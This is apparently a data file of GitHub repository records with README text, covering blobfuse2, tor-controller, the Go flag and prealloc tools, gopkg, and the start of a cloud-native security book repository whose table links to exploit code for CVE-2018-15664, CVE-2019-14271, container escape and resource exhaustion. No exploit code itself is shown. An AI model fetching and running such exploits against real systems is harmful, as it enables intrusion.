Allow other users to have access this mount point.\r\n * `--disable-writeback-cache=true`: Disallow libfuse to buffer write requests if you must strictly open files in O_WRONLY or O_APPEND mode.\r\n * `--ignore-open-flags=true`: Ignore the append and write only flag since O_APPEND and O_WRONLY is not supported with writeback caching.\r\n\r\n\r\n## Environment variables\r\n- General options\r\n * `AZURE_STORAGE_ACCOUNT`: Specifies the storage account to be connected.\r\n * `AZURE_STORAGE_ACCOUNT_TYPE`: Specifies the account type 'block' or 'adls'\r\n * `AZURE_STORAGE_ACCOUNT_CONTAINER`: Specifies the name of the container to be mounted\r\n * `AZURE_STORAGE_BLOB_ENDPOINT`: Specifies the blob endpoint to use. Defaults to *.blob.core.windows.net, but is useful for targeting storage emulators.\r\n * `AZURE_STORAGE_AUTH_TYPE`: Overrides the currently specified auth type. Case insensitive. Options: Key, SAS, MSI, SPN\r\n- Account key auth:\r\n * `AZURE_STORAGE_ACCESS_KEY`: Specifies the storage account key to use for authentication.\r\n- SAS token auth:\r\n * `AZURE_STORAGE_SAS_TOKEN`: Specifies the SAS token to use for authentication.\r\n- Managed Identity auth:\r\n * `AZURE_STORAGE_IDENTITY_CLIENT_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `AZURE_STORAGE_IDENTITY_OBJECT_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `AZURE_STORAGE_IDENTITY_RESOURCE_ID`: Only one of these three parameters are needed if multiple identities are present on the system.\r\n * `MSI_ENDPOINT`: Specifies a custom managed identity endpoint, as IMDS may not be available under some scenarios. Uses the `MSI_SECRET` parameter as the `Secret` header.\r\n * `MSI_SECRET`: Specifies a custom secret for an alternate managed identity endpoint.\r\n- Service Principal Name auth:\r\n * `AZURE_STORAGE_SPN_CLIENT_ID`: Specifies the client ID for your application registration\r\n * `AZURE_STORAGE_SPN_TENANT_ID`: Specifies the tenant ID for your application registration\r\n * `AZURE_STORAGE_AAD_ENDPOINT`: Specifies a custom AAD endpoint to authenticate against\r\n * `AZURE_STORAGE_SPN_CLIENT_SECRET`: Specifies the client secret for your application registration.\r\n- Proxy Server:\r\n * `http_proxy`: The proxy server address. Example: `10.1.22.4:8080`. \r\n * `https_proxy`: The proxy server address when https is turned off forcing http. Example: `10.1.22.4:8080`.\r\n\r\n## Config file\r\n- See [this](./sampleFileCacheConfig.yaml) sample config file.\r\n- See [this](./setup/baseConfig.yaml) config file for a list and description of all possible configurable options in blobfuse2. \r\n\r\n***Please note: do not use quotations `\"\"` for any of the config parameters***\r\n\r\n## Frequently Asked Questions\r\n- How do I generate a SAS with permissions for rename?\r\naz cli has a command to generate a sas token. Open a command prompt and make sure you are logged in to az cli. Run the following command and the sas token will be displayed in the command prompt.\r\naz storage container generate-sas --account-name --account-key -n --permissions dlrwac --start --expiry \r\n- Why do I get EINVAL on opening a file with WRONLY or APPEND flags?\r\nTo improve performance, Blobfuse2 by default enables writeback caching, which can produce unexpected behavior for files opened with WRONLY or APPEND flags, so Blobfuse2 returns EINVAL on open of a file with those flags. Either use disable-writeback-caching to turn off writeback caching (can potentially result in degraded performance) or ignore-open-flags (replace WRONLY with RDWR and ignore APPEND) based on your workload. \r\n- How to mount blobfuse2 inside a container?\r\nRefer to 'docker' folder in this repo. It contains a sample 'Dockerfile'. If you wish to create your own container image, try 'buildandruncontainer.sh' script, it will create a container image and launch the container using current environment variables holding your storage account credentials.\r\n \r\n## Un-Supported File system operations\r\n- mkfifo : fifo creation is not supported by blobfuse2 and this will result in \"function not implemented\" error\r\n- chown : Change of ownership is not supported by Azure Storage hence Blobfuse2 does not support this.\r\n- Creation of device files or pipes is not supported by Blobfuse2.\r\n- Blobfuse2 does not support extended-attributes (x-attrs) operations\r\n\r\n## Un-Supported Scenarios\r\n- Blobfuse2 does not support overlapping mount paths. While running multiple instances of Blobfuse2 make sure each instance has a unique and non-overlapping mount point.\r\n- Blobfuse2 does not support co-existance with NFS on same mount path. Behaviour in this case is undefined.\r\n- For block blob accounts, where data is uploaded through other means, Blobfuse2 expects special directory marker files to exist in container. In absence of this\r\n few file operations might not work. For e.g. if you have a blob 'A/B/c.txt' then special marker files shall exists for 'A' and 'A/B', otherwise opening of 'A/B/c.txt' will fail.\r\n Once a 'ls' operation is done on these directories 'A' and 'A/B' you will be able to open 'A/B/c.txt' as well. Possible workaround to resolve this from your container is to either\r\n\r\n create the directory marker files manually through portal or run 'mkdir' command for 'A' and 'A/B' from blobfuse. Refer [me](https://github.com/Azure/azure-storage-fuse/issues/866) \r\n for details on this.\r\n\r\n## Limitations\r\n- In case of BlockBlob accounts, ACLs are not supported by Azure Storage so Blobfuse2 will by default return success for 'chmod' operation. However it will work fine for Gen2 (DataLake) accounts.\r\n\r\n\r\n### Syslog security warning\r\nBy default, Blobfuse2 will log to syslog. The default settings will, in some cases, log relevant file paths to syslog. \r\nIf this is sensitive information, turn off logging or set log-level to LOG_ERR. \r\n\r\n\r\n## License\r\nThis project is licensed under MIT.\r\n \r\n## Contributing\r\nThis project welcomes contributions and suggestions. Most contributions \r\nrequire you to agree to a Contributor License Agreement (CLA) declaring \r\nthat you have the right to, and actually do, grant us the rights to use \r\nyour contribution. For details, visit https://cla.microsoft.com.\r\n\r\nWhen you submit a pull request, a CLA-bot will automatically determine \r\nwhether you need to provide a CLA and decorate the PR appropriately \r\n(e.g., label, comment). Simply follow the instructions provided by the \r\nbot. You will only need to do this once across all repos using our CLA.\r\n\r\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).\r\nFor more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or\r\ncontact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\r\n\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kragniz/tor-controller", "link": "https://github.com/kragniz/tor-controller", "tags": ["kubernetes", "tor"], "stars": 520, "description": "Run Tor onion services on Kubernetes", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n

tor-controller

\n\n[![Build Status](https://img.shields.io/travis-ci/kragniz/tor-controller.svg?style=flat-square)](https://travis-ci.org/kragniz/tor-controller)\n\nTor is an anonymity network that provides:\n\n- privacy\n- enhanced tamperproofing\n- freedom from network surveillance\n- NAT traversal\n\ntor-controller allows you to create `OnionService` resources in kubernetes.\nThese services are used similarly to standard kubernetes services, but they\nonly serve traffic on the tor network (available on `.onion` addresses).\n\nSee [this page](https://www.torproject.org/docs/onion-services.html.en) for\nmore information about onion services.\n\ntor-controller creates the following resources for each OnionService:\n\n- a service, which is used to send traffic to application pods\n- tor pod, which contains a tor daemon to serve incoming traffic from the tor\n network, and a management process that watches the kubernetes API and\n generates tor config, signaling the tor daemon when it changes\n- rbac rules\n\n

\n \n

\n\nInstall\n-------\n\nInstall tor-controller:\n\n $ kubectl apply -f hack/install.yaml\n\nQuickstart with random address\n------------------------------\n\nCreate an onion service, `onionservice.yaml`:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: basic-onion-service\nspec:\n version: 2\n selector:\n app: example\n ports:\n - publicPort: 80\n targetPort: 80\n```\n\nApply it:\n\n $ kubectl apply -f onionservice.yaml\n\nView it:\n\n```bash\n$ kubectl get onionservices -o=custom-columns=NAME:.metadata.name,HOSTNAME:.status.hostname\nNAME HOSTNAME\nbasic-onion-service h7px2yyugjqkztrb.onion\n```\n\nExposing a deployment with a fixed address\n------------------------------------------\n\nCreate some deployment to test against, in this example we'll deploy an echoserver. Create `echoserver.yaml`:\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: http-app\nspec:\n replicas: 2\n selector:\n matchLabels:\n app: http-app\n template:\n metadata:\n labels:\n app: http-app\n spec:\n containers:\n - name: http-app\n image: gcr.io/google_containers/echoserver:1.8\n ports:\n - containerPort: 8080\n```\nApply it:\n\n $ kubectl apply -f echoserver.yaml\n\nFor a fixed address, we need a private key. This should be kept safe, since\nsomeone can impersonate your onion service if it is leaked.\nGenerate an RSA private key (only valid for v2 onion services, v3 services use Ed25519 instead):\n\n $ openssl genrsa -out private_key 1024\n\nPut your private key into a secret:\n\n $ kubectl create secret generic example-onion-key --from-file=private_key\n\nCreate an onion service, `onionservice.yaml`, referencing the private key we just created:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: example-onion-service\nspec:\n version: 2\n selector:\n app: http-app\n ports:\n - targetPort: 8080\n publicPort: 80\n privateKeySecret:\n name: example-onion-key\n key: private_key\n```\n\nApply it:\n\n $ kubectl apply -f onionservice.yaml\n\nList active OnionServices:\n\n```\n$ kubectl get onionservices -o=custom-columns=NAME:.metadata.name,HOSTNAME:.status.hostname\nNAME HOSTNAME\nexample-onion-service s2c6qry5bj57vyms.onion\n```\n\nThis service should now be accessable from any tor client,\nfor example [Tor Browser](https://www.torproject.org/projects/torbrowser.html.en):\n\n

\n \n

\n\nRandom service names\n--------------------\n\nIf `spec.privateKeySecret` is not specified, tor-controller will start a service with a random name.\nThis will remain in use until the tor-daemon pod restarts or is terminated for some other reason.\n\nOnion service versions\n----------------------\n\nThe `spec.version` field specifies which onion protocol to use.\nv2 is the classic and well supported, v3 is the new replacement.\n\nThe biggest difference from a user's point of view is the length of addresses. v2\nservice names are short, like `x3yvl2svtqgzhcyz.onion`. v3 are longer, like\n`ljgpby5ba3xi5osslpdvqsumdb4sbclb2amxtm6a3cwnq7w7sj72noid.onion`.\n\ntor-controller defaults to using v3 if `spec.version` is not specified.\n\n\nUsing with nginx-ingress\n------------------------\n\ntor-controller on its own simply directs TCP traffic to a backend service.\nIf you want to serve HTTP stuff, you'll probably want to pair it with\nnginx-ingress or some other ingress controller.\n\nTo do this, first install nginx-ingress normally. Then point an onion service\nat the nginx-ingress-controller, for example:\n\n```yaml\napiVersion: tor.k8s.io/v1alpha1\nkind: OnionService\nmetadata:\n name: nginx-onion-service\nspec:\n version: 2\n selector:\n app: nginx-ingress-controller\n name: nginx-ingress-controller\n ports:\n - publicPort: 80\n targetPort: 80\n name: http\n privateKeySecret:\n name: nginx-onion-key\n key: private_key\n```\n\nThis can then be used in the same way any other ingress is. Here's a full\nexample, with a default backend and a subdomain:\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: http-app\nspec:\n replicas: 2\n selector:\n matchLabels:\n app: http-app\n template:\n metadata:\n labels:\n app: http-app\n spec:\n containers:\n - name: http-app\n image: gcr.io/google_containers/echoserver:1.8\n ports:\n - containerPort: 8080\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: http-app\n labels:\n app: http-app\nspec:\n ports:\n - port: 80\n protocol: TCP\n targetPort: 8080\n selector:\n app: http-app\n---\napiVersion: extensions/v1beta1\nkind: Ingress\nmetadata:\n name: http-app\n annotations:\n nginx.ingress.kubernetes.io/rewrite-target: /\nspec:\n backend:\n serviceName: default-http-backend\n servicePort: 80\n rules:\n - host: echoserver.h7px3yyugjqkztrb.onion\n http:\n paths:\n - path: /\n backend:\n serviceName: http-app\n servicePort: 8080\n```\n", "readme_type": "markdown", "hn_comments": "Good stuff! I wish there was some good in-depth and well explained article on how to write or hook up your own controller. I mean, there is the official doc for this but it's not really a hands-on IMHO.If all you need is a Go library for connecting to a Tor daemon and adding/removing hidden services: https://godoc.org/github.com/wybiral/torgoGreat documentation!I particularly like that you mentioned \"NAT Traversal\" as one of the benefits of hidden services.I think that's an overlooked feature that would in many cases be enough of a reason for one to use them, even without caring for the added privacy.If you include this in the image, then your machine can talk to .onion addresses natively across the system, without having to use torify or socks5 proxy setups. This enables in doing things like sending logs to *.onion , having an OOB at a different .onion , and more.I send my IoT traffic to a MQTT onionseerver I run.https://cdn.hackaday.io/files/12985555550240/Linux%20DNS%20R...Nice logo!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "namsral/flag", "link": "https://github.com/namsral/flag", "tags": [], "stars": 520, "description": "Parse flags, environment variables and config files", "lang": "Go", "repo_lang": "", "readme": "Flag\n===\n\nFlag is a drop in replacement for Go's flag package with the addition to parse files and environment variables. If you support the [twelve-factor app methodology][], Flag complies with the third factor; \"Store config in the environment\".\n\n[twelve-factor app methodology]: http://12factor.net\n\nAn example using a gopher:\n\n```go\n$ cat > gopher.go\n package main\n\n import (\n \"fmt\"\n \t\"github.com/namsral/flag\"\n\t)\n \n func main() {\n \tvar age int\n\tflag.IntVar(&age, \"age\", 0, \"age of gopher\")\n\tflag.Parse()\n\tfmt.Print(\"age:\", age)\n }\n$ go run gopher.go -age 1\nage: 1\n```\n\nSame code but using an environment variable:\n\n```go\n$ export AGE=2\n$ go run gopher.go\nage: 2\n```\n \n\nSame code but using a configuration file:\n\n```go\n$ cat > gopher.conf\nage 3\n\n$ go run gopher.go -config gopher.conf\nage: 3\n```\n\nThe following table shows how flags are translated to environment variables and configuration files:\n\n| Type | Flag | Environment | File |\n| ------ | :------------ |:------------ |:------------ |\n| int | -age 2 | AGE=2 | age 2 |\n| bool | -female | FEMALE=true | female true |\n| float | -length 175.5 | LENGTH=175.5 | length 175.5 |\n| string | -name Gloria | NAME=Gloria | name Gloria |\n\nThis package is a port of Go's [flag][] package from the standard library with the addition of two functions `ParseEnv` and `ParseFile`.\n\n[flag]: http://golang.org/src/pkg/flag\n\n\nGoals\n-----\n\n- Compatability with the original `flag` package\n- Support the [twelve-factor app methodology][]\n- Uniform user experience between the three input methods\n\n\nWhy?\n---\n\nWhy not use one of the many INI, JSON or YAML parsers?\n\nI find it best practice to have simple configuration options to control the behaviour of an applications when it starts up. Use basic types like ints, floats and strings for configuration options and store more complex data structures in the \"datastore\" layer.\n\n\nUsage\n---\n\nIt's intended for projects which require a simple configuration made available through command-line flags, configuration files and shell environments. It's similar to the original `flag` package.\n\nExample:\n\n```go\nimport \"github.com/namsral/flag\"\n\nflag.String(flag.DefaultConfigFlagname, \"\", \"path to config file\")\nflag.Int(\"age\", 24, \"help message for age\")\n\nflag.Parse()\n```\n\nOrder of precedence:\n\n1. Command line options\n2. Environment variables\n3. Configuration file\n4. Default values\n\n\n#### Parsing Configuration Files\n\nCreate a configuration file:\n\n```go\n$ cat > ./gopher.conf\n# empty newlines and lines beginning with a \"#\" character are ignored.\nname bob\n\n# keys and values can also be separated by the \"=\" character\nage=20\n\n# booleans can be empty, set with 0, 1, true, false, etc\nhacker\n```\n\nAdd a \"config\" flag:\n\n```go\nflag.String(flag.DefaultConfigFlagname, \"\", \"path to config file\")\n```\n\nRun the command:\n\n```go\n$ go run ./gopher.go -config ./gopher.conf\n```\n\nThe default flag name for the configuration file is \"config\" and can be changed\nby setting `flag.DefaultConfigFlagname`:\n\n```go\nflag.DefaultConfigFlagname = \"conf\"\nflag.Parse()\n```\n\n#### Parsing Environment Variables\n\nEnvironment variables are parsed 1-on-1 with defined flags:\n\n```go\n$ export AGE=44\n$ go run ./gopher.go\nage=44\n```\n\n\nYou can also parse prefixed environment variables by setting a prefix name when creating a new empty flag set:\n\n```go\nfs := flag.NewFlagSetWithEnvPrefix(os.Args[0], \"GO\", 0)\nfs.Int(\"age\", 24, \"help message for age\")\nfs.Parse(os.Args[1:])\n...\n$ go export GO_AGE=33\n$ go run ./gopher.go\nage=33\n```\n\n\nFor more examples see the [examples][] directory in the project repository.\n\n[examples]: https://github.com/namsral/flag/tree/master/examples\n\nThat's it.\n\n\nLicense\n---\n\n\nCopyright (c) 2012 The Go Authors. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\n * Redistributions of source code must retain the above copyright\nnotice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above\ncopyright notice, this list of conditions and the following disclaimer\nin the documentation and/or other materials provided with the\ndistribution.\n * Neither the name of Google Inc. nor the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nOWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alexkohler/prealloc", "link": "https://github.com/alexkohler/prealloc", "tags": ["golang", "go", "static-code-analysis", "static-analyzer", "static-analysis", "prealloc-suggestions", "slice"], "stars": 520, "description": "prealloc is a Go static analysis tool to find slice declarations that could potentially be preallocated.", "lang": "Go", "repo_lang": "", "readme": "# prealloc\n\nprealloc is a Go static analysis tool to find slice declarations that could potentially be preallocated.\n\n## Installation\n\n go get -u github.com/alexkohler/prealloc\n\n## Usage\n\nSimilar to other Go static analysis tools (such as golint, go vet), prealloc can be invoked with one or more filenames, directories, or packages named by its import path. Prealloc also supports the `...` wildcard.\n\n prealloc [flags] files/directories/packages\n\n### Flags\n- **-simple** (default true) - Report preallocation suggestions only on simple loops that have no returns/breaks/continues/gotos in them. Setting this to false may increase false positives.\n- **-rangeloops** (default true) - Report preallocation suggestions on range loops.\n- **-forloops** (default false) - Report preallocation suggestions on for loops. This is false by default due to there generally being weirder things happening inside for loops (at least from what I've observed in the Standard Library).\n- **-set_exit_status** (default false) - Set exit status to 1 if any issues are found.\n\n## Purpose\n\nWhile the [Go *does* attempt to avoid reallocation by growing the capacity in advance](https://github.com/golang/go/blob/87e48c5afdcf5e01bb2b7f51b7643e8901f4b7f9/src/runtime/slice.go#L100-L112), this sometimes isn't enough for longer slices. If the size of a slice is known at the time of its creation, it should be specified.\n\nConsider the following benchmark: (this can be found in prealloc_test.go in this repo)\n\n```Go\nimport \"testing\"\n\nfunc BenchmarkNoPreallocate(b *testing.B) {\n\texisting := make([]int64, 10, 10)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Don't preallocate our initial slice\n\t\tvar init []int64\n\t\tfor _, element := range existing {\n\t\t\tinit = append(init, element)\n\t\t}\n\t}\n}\n\nfunc BenchmarkPreallocate(b *testing.B) {\n\texisting := make([]int64, 10, 10)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Preallocate our initial slice\n\t\tinit := make([]int64, 0, len(existing))\n\t\tfor _, element := range existing {\n\t\t\tinit = append(init, element)\n\t\t}\n\t}\n}\n```\n\n```Bash\n$ go test -bench=. -benchmem\ngoos: linux\ngoarch: amd64\nBenchmarkNoPreallocate-4 \t 3000000\t 510 ns/op\t 248 B/op\t 5 allocs/op\nBenchmarkPreallocate-4 \t20000000\t 111 ns/op\t 80 B/op\t 1 allocs/op\n```\n\nAs you can see, not preallocating can cause a performance hit, primarily due to Go having to reallocate the underlying array. The pattern benchmarked above is common in Go: declare a slice, then write some sort of range or for loop that appends or indexes into it. The purpose of this tool is to flag slice/loop declarations like the one in `BenchmarkNoPreallocate`. \n\n## Example\n\nSome examples from the Go 1.9.2 source:\n\n```Bash\n$ prealloc go/src/....\narchive/tar/reader_test.go:854 Consider preallocating ss\narchive/zip/zip_test.go:201 Consider preallocating all\ncmd/api/goapi.go:301 Consider preallocating missing\ncmd/api/goapi.go:476 Consider preallocating files\ncmd/asm/internal/asm/endtoend_test.go:345 Consider preallocating extra\ncmd/cgo/main.go:60 Consider preallocating ks\ncmd/cgo/ast.go:149 Consider preallocating pieces\ncmd/compile/internal/ssa/flagalloc.go:64 Consider preallocating oldSched\ncmd/compile/internal/ssa/regalloc.go:719 Consider preallocating phis\ncmd/compile/internal/ssa/regalloc.go:718 Consider preallocating oldSched\ncmd/compile/internal/ssa/regalloc.go:1674 Consider preallocating oldSched\ncmd/compile/internal/ssa/gen/rulegen.go:145 Consider preallocating ops\ncmd/compile/internal/ssa/gen/rulegen.go:145 Consider preallocating ops\ncmd/dist/build.go:893 Consider preallocating all\ncmd/dist/build.go:1246 Consider preallocating plats\ncmd/dist/build.go:1264 Consider preallocating results\ncmd/dist/buildgo.go:59 Consider preallocating list\ncmd/doc/pkg.go:363 Consider preallocating names\ncmd/fix/typecheck.go:219 Consider preallocating b\ncmd/go/internal/base/path.go:34 Consider preallocating out\ncmd/go/internal/get/get.go:175 Consider preallocating out\ncmd/go/internal/load/pkg.go:1894 Consider preallocating dirent\ncmd/go/internal/work/build.go:2402 Consider preallocating absOfiles\ncmd/go/internal/work/build.go:2731 Consider preallocating absOfiles\ncmd/internal/objfile/pe.go:48 Consider preallocating syms\ncmd/internal/objfile/pe.go:38 Consider preallocating addrs\ncmd/internal/objfile/goobj.go:43 Consider preallocating syms\ncmd/internal/objfile/elf.go:35 Consider preallocating syms\ncmd/link/internal/ld/lib.go:1070 Consider preallocating argv\ncmd/vet/all/main.go:91 Consider preallocating pp\ndatabase/sql/sql.go:66 Consider preallocating list\ndebug/macho/file.go:506 Consider preallocating all\ninternal/trace/order.go:55 Consider preallocating batches\nmime/quotedprintable/reader_test.go:191 Consider preallocating outcomes\nnet/dnsclient_unix_test.go:954 Consider preallocating confLines\nnet/interface_solaris.go:85 Consider preallocating ifat\nnet/interface_linux_test.go:91 Consider preallocating ifmat4\nnet/interface_linux_test.go:100 Consider preallocating ifmat6\nnet/internal/socktest/switch.go:34 Consider preallocating st\nos/os_windows_test.go:766 Consider preallocating args\nruntime/pprof/internal/profile/filter.go:77 Consider preallocating lines\nruntime/pprof/internal/profile/profile.go:554 Consider preallocating names\ntext/template/parse/node.go:189 Consider preallocating decl\n```\n\n```Go\n// cmd/api/goapi.go:301\nvar missing []string\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n\n// cmd/fix/typecheck.go:219\nvar b []ast.Expr\nfor _, x := range a {\n\tb = append(b, x)\n}\n\n// net/internal/socktest/switch.go:34\nvar st []Stat\nsw.smu.RLock()\nfor _, s := range sw.stats {\n\tns := *s\n\tst = append(st, ns)\n}\nsw.smu.RUnlock()\n\n// cmd/api/goapi.go:301\nvar missing []string\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n```\n\nEven if the size the slice is being preallocated to is small, there's still a performance gain to be had in explicitly specifying the capacity rather than leaving it up to `append` to discover that it needs to preallocate. Of course, preallocation doesn't need to be done *everywhere*. This tool's job is just to help suggest places where one should consider preallocating.\n\n## How do I fix prealloc's suggestions?\n\nDuring the declaration of your slice, rather than using the zero value of the slice with `var`, initialize it with Go's built-in `make` function, passing the appropriate type and length. This length will generally be whatever you are ranging over. Fixing the examples from above would look like so:\n\n```Go\n// cmd/api/goapi.go:301\nmissing := make([]string, 0, len(optionalSet))\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n\n// cmd/fix/typecheck.go:219\nb := make([]ast.Expr, 0, len(a))\nfor _, x := range a {\n\tb = append(b, x)\n}\n\n// net/internal/socktest/switch.go:34\nst := make([]Stat, 0, len(sw.stats))\nsw.smu.RLock()\nfor _, s := range sw.stats {\n\tns := *s\n\tst = append(st, ns)\n}\nsw.smu.RUnlock()\n\n// cmd/api/goapi.go:301\nmissing := make ([]string, 0, len(optionalSet))\nfor feature := range optionalSet {\n\tmissing = append(missing, feature)\n}\n```\n\nNote: If performance is absolutely critical, it may be more efficient to use `copy` instead of `append` for larger slices. For reference, see the following benchmark:\n```Go\nfunc BenchmarkSize200PreallocateCopy(b *testing.B) {\n\texisting := make([]int64, 200, 200)\n\tb.ResetTimer()\n\tfor i := 0; i < b.N; i++ {\n\t\t// Preallocate our initial slice\n\t\tinit := make([]int64, len(existing))\n\t\tcopy(init, existing)\n\t}\n}\n```\n```\n$ go test -bench=. -benchmem\ngoos: linux\ngoarch: amd64\nBenchmarkSize200NoPreallocate-4 \t 500000\t 3080 ns/op\t 4088 B/op\t 9 allocs/op\nBenchmarkSize200Preallocate-4 \t 1000000\t 1163 ns/op\t 1792 B/op\t 1 allocs/op\nBenchmarkSize200PreallocateCopy-4 \t 2000000\t 807 ns/op\t 1792 B/op\t 1 allocs/op\n```\n\n## TODO\n\n- Configuration on whether or not to run on test files\n- Support for embedded ifs (currently, prealloc will only find breaks/returns/continues/gotos if they are in a single if block, I'd like to expand this to supporting multiple if blocks in the future).\n- Globbing support (e.g. prealloc *.go)\n\n\n## Contributing\n\nPull requests welcome!\n\n\n## Other static analysis tools\n\nIf you've enjoyed prealloc, take a look at my other static analysis tools!\n- [nakedret](https://github.com/alexkohler/nakedret) - Finds naked returns.\n- [unimport](https://github.com/alexkohler/unimport) - Finds unnecessary import aliases.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "niemeyer/gopkg", "link": "https://github.com/niemeyer/gopkg", "tags": [], "stars": 520, "description": "Source code for the gopkg.in service.", "lang": "Go", "repo_lang": "", "readme": "# gopkg.in Stable APIs for the Go language\n\nSee [http://gopkg.in](http://gopkg.in).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Metarget/cloud-native-security-book", "link": "https://github.com/Metarget/cloud-native-security-book", "tags": [], "stars": 520, "description": "\u300a\u4e91\u539f\u751f\u5b89\u5168\uff1a\u653b\u9632\u5b9e\u8df5\u4e0e\u4f53\u7cfb\u6784\u5efa\u300b\u8d44\u6599\u4ed3\u5e93", "lang": "Go", "repo_lang": "", "readme": "# \"Cloud native security: offensive and defensive practice and system construction\" data warehouse\n\n

\n \"\"\n

\n\nThis warehouse provides the supplementary materials and accompanying source code of the book \"Cloud Native Security: Offensive and Defense Practice and System Construction\", for interested readers to read and practice in depth.\n\n**All content in this warehouse is for teaching and research use only, and illegal use is strictly prohibited. Violators will be responsible for the consequences! **\n\nRelated links: [Douban](https://book.douban.com/subject/35640762/) | [Jingdong](https://item.jd.com/13495676.html) | [Dangdang](http:// product.dangdang.com/29318802.html)\n\n## Supplementary reading material\n\n- [100_Introduction to Cloud Computing.pdf](appendix/100_Introduction to Cloud Computing.pdf)\n- [101_Code Security.pdf](appendix/101_Code Security.pdf)\n- [200_Container Technology.pdf](appendix/200_Container Technology.pdf)\n- [201_Container Orchestration.pdf](appendix/201_Container Orchestration.pdf)\n- [202_Microservice.pdf](appendix/202_Microservice.pdf)\n- [203_Service Grid.pdf](appendix/203_Service Grid.pdf)\n- [204_DevOps.pdf](appendix/204_DevOps.pdf)\n- [CVE-2017-1002101: Accessing host file system through isolation.pdf](appendix/CVE-2017-1002101: Accessing host file system through isolation.pdf)\n- [CVE-2018-1002103: Remote Code Execution and Virtual Machine Escape.pdf](appendix/CVE-2018-1002103: Remote Code Execution and Virtual Machine Escape.pdf)\n- [CVE-2020-8595: Istio Authentication Bypass.pdf](appendix/CVE-2020-8595: Istio Authentication Bypass.pdf)\n- [Target Experiment: Infiltration Combat in Comprehensive Scenario.pdf](appendix/Target Experiment: Infiltration Combat in Comprehensive Scenario.pdf)\n\n## Accompanying book source code\n\n|Code Directory|Description|Location|\n|:-|:-|:-|\n|[0302-development side attack/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-development side Attack/02-CVE-2018-15664/symlink_race)| CVE-2018-15664 exploit code|Section 3.2.2|\n|[0302-Development side attack/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-Development side attack/ 03-CVE-2019-14271)|CVE-2019-14271 exploit code|Section 3.2.3|\n|[0303-Supply Chain Attack/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-Supply Chain Attack/01-CVE-2019-5021-alpine)|An example of building a vulnerable image based on an Alpine image with a CVE-2019-5021 vulnerability|Section 3.3.1|\n|[0303-Supply Chain Attack/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303- Supply chain attack/02-CVE-2016-5195-malicious-image)|CVE-2016-5195 exploit image construction example|Section 3.3.2|\n|[0304-runtime attack/01-container escape/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-runtime attack/01-container Escape)|Multiple code snippets for container escape|Section 3.4.1|\n|[0304-Runtime Attack/02-Security Container Escape/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-Runtime Attack/02- Secure Container Escape) | Exploit Code for Secure Container Escape | Section 3.4.2 |\n|[0304-runtime attack/03-resource exhaustion attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-runtime attack/ 03-Resource Exhaustion Attack)|Example Code of Resource Exhaustion Attack|Section 3.4.3|\n|[0402-Kubernetes component insecure configuration/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes component insecure configuration/)|K8s does not Security Configuration Utilization Commands | Section 4.2 |\n|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018 -1002105 Exploit Code | Section 4.3 |\n|[0404-K8s Denial of Service 